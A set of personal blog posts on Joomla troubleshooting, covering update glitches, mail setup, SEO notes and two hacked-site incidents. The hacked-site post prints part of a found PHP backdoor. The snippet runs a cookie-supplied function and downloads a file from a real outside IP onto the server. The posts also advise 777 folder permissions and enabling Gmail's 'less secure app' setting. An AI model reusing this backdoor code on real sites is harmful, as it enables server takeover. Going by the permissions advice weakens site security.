Joomla 3.6.3 Unable To Edit Module

I updated a bunch of sites yesterday after the 3.6.3 release. When I went to add the login module the edit page was complete white with a drop down box. I was deeply concerned and thought maybe this Gantry template was the issue. It was not. I found this page.

https://forum.joomla.org/viewtopic.php?f=709&p=3435967

I refreshed the browser window and everything was fine. Basically came down to Joomla worked on their caching component and you need to manually refresh the page.

Another install I upgraded simply refreshing the cache did not work. I was using Firefox. Firefox is making it tough to find the delete recent history. I had to close out of the administrative area all together. Open a new tab and then the modules were be having the way they should.

The articles are a different story. When I go into edit an article I get the following message.

joomla_3_6_3_update_error

I can still edit and save the article

I hope this helps someone else out there.

 

Help Sucuri Clean Sites

Sucuri Antivirus is a great service. I found an attack on a Joomla 3.5 site where a PayPal form and zip file were inserted into the images folder.

There were the following clues to the attack:

  • PHP & INI files in the images directory
  • New folders called “bt”, “BT”, and “mic” in the images directory.

I contacted Sucuri to see if they wanted my findings and they have an email address to accept this kind of information …. labs@sucuri.net

I hope this helps someone else out there…

 

JS Jobs – Not Displaying Company Logo on Job Search

I am taking JS Jobs component out for a test drive. I posted a few test jobs from a test company and logo doesn’t show on the jobs page.

I was able to get this to work by doing the following.

In the file “components/com_jsjobs/views/job/joblisting.php” line 75,  I added the following.

<img src="'. $path  .'">'

The whole line now looks like

$html .=        '<div class="js-image"><img src="'. $path  .'">';

I hope this helps someone else out there…

 

Solved – Joomla 3 Localhost – Could not instantiate mail function.

While working on a Joomla site in WAMP I went to test the email and got the following error.

Notice
Could not instantiate mail function.

Here is how I fixed this. This could be the long way, but it worked for me.

  1. I had to set up sendmail. I wrote about my best solution for localhost in this post.
    http://blog.grimeymedia.com/setting-up-mail-service-in-wamp/
  2. Then in Joomla I went to Global Configuration  >> Server tab. At the bottom is “Mail Settings”.
  3. I changed “Mailer” to “Sendmail”, and set the path to  “C:\wamp\sendmail\sendmail.exe”
    sendmail_path_joomla

When using GMail to set this up you will to “turn on” their “use less secure app” setting. Log into your Google account and then Google “use less secure app” and it should link you to the page to turn this on.

I hope this helps someone else out there…

Joomla Security Check Extension – trying this one out

Got an email from Joomshine about security. I have had a couple of Joomla sites get attacked, and really want not have to deal with lack of faith that the site is attacker proof.

I downloaded this plugin “Securitycheck”, and I am going to take it for a test run. I will let you know how it goes.  Here is the link.

https://extensions.joomla.org/extension/securitycheck

I hope this helps someone else out there…

 

Joomla SEO – Cloud Access.net’s guide

I am working on a site’s SEO. In June I did what I thought was a good process

  1. Adjust the page titles
  2. Adjust the page discriptions
  3. Set SEF title and Mod ReWrite

But now in September I feel like there is a significant drop off; although, the traffic seems to be better traffic. The numbers don’t assure me that my techniques were good.

 

I stumbbled upon this video by CloudAccess.
https://www.youtube.com/watch?v=Y5et1JZ3BjY

They recommend using Google Adwords tool.
Google AdWords Keyword Tool 

 

Here is a link to Cloud Access’s Guide to SEO.

http://www.cloudaccess.net/additional-resources/56-search-engine-optimization-seo.html

I am going to review this and see if it helps.

 

They used pingdom.com to test load times of their pages.

 

I also came across this video from a Joomla Day

This guy really recommend sh404SEF.

He also schooled me on CDN (content delivery network) – for distributing your images across different servers around the world so when your site is accessed from someone far away they will be pulling the images from a server that is closer to them.

I hope this helps someone else out there…

 

 

Google Analytics – Joomla 3.6.2 – frequent queries

Looking at a customers analytics I see the following a lot.

“please enter the email address for your account. a verification code will be sent to you. once you have received the verification code, you will be able to choose a new password for your account.”

This is when you need to recover your password.

This text is located in “language/en-GB/en-GB.com_users.ini”.  I used Notepad++ to easy edit this text in hoping it will change the results.

I hope this helps someone else out there…

 

 

Hacked Joomla 3.6.2 site – cms brute rmf 3.0.zip file found in Godaddy hosting.

Had a recent Joomla 3.6.2 install go blank. Site was fine one day and the next it was unreachable.

I FTP’ed into the site and I see WordPress folders in there and other strange files. There was a zip file called “cms brute rmf 3.0.zip”. Thre were odd PHP files such a “ebb6bff35a.php”. Look like an attack for sure. The PHP file was extremely complex.

The file “ebb6bff35a.php” starts out by grabbing the id set in a cookie for “user id” then points back the following ip with the cookie information. This IP stems from Belize.

if (isset($_COOKIE[“id”])) @$_COOKIE[“user”]($_COOKIE[“id”]);

if( isset($_REQUEST[“test_url”]) ){

echo “file test okay”; }

$f =$_GET[“d”];

$id=$f;

$current = file_get_contents(“http://80.87.205.79/$f”);

file_put_contents($id, $current);

if (!defined(‘PCLZIP_READ_BLOCK_SIZE’)) {

define( ‘PCLZIP_READ_BLOCK_SIZE’, 2048 );

}

files_in_joomla_install

Hopefully I can figure out what happen, but I am worried about security for sure.

 

After contacting Godaddy it looks like a complete attack. Uploaded PHP files, directories were created, and I didn’t get to check the database. Had to do a GoDaddy account reset and restore from an Akeeba backup.

The backup didn’t go well I got the following error.

akeeba_ajax_error

I followed the instructions on this page.

https://www.akeebabackup.com/documentation/troubleshooter/kscantextract.html

I had to create the “kicktemp” folder. Set the permissions to 777.  Set the type of install to FTP. For the root directory I had to use “/”.  Make sure to test the FTP connection.

The Kickstart restore took about 25 minutes to restore.

Here are the specs on the site.

  • Joomla 3.6.2
  • JCE
  • Akeeba
  • Chronoforms
  • JO Facebook Events Pro
  • Hot Themes Hot Fitness template.

One of the worst parts of this whole debacle is their SEO. The site was live for a month before the attack and the analytics were clicking along nicely. The site was getting around 300 plus hits a in the first month with around 100 key word matches.

During the attack the number of key word matches jumped to 16,000 matches and incredibility junky results.

analytics

This is a running store and have nothing to do with “sexy turkey”.  This all happened in just a few days. I really hope this doesn’t offend Google and they decide to block the site.

I hope this helps someone else out there…

 

Follow up:

A month later after this attack I looked at all of the directories and found no trace of another attack.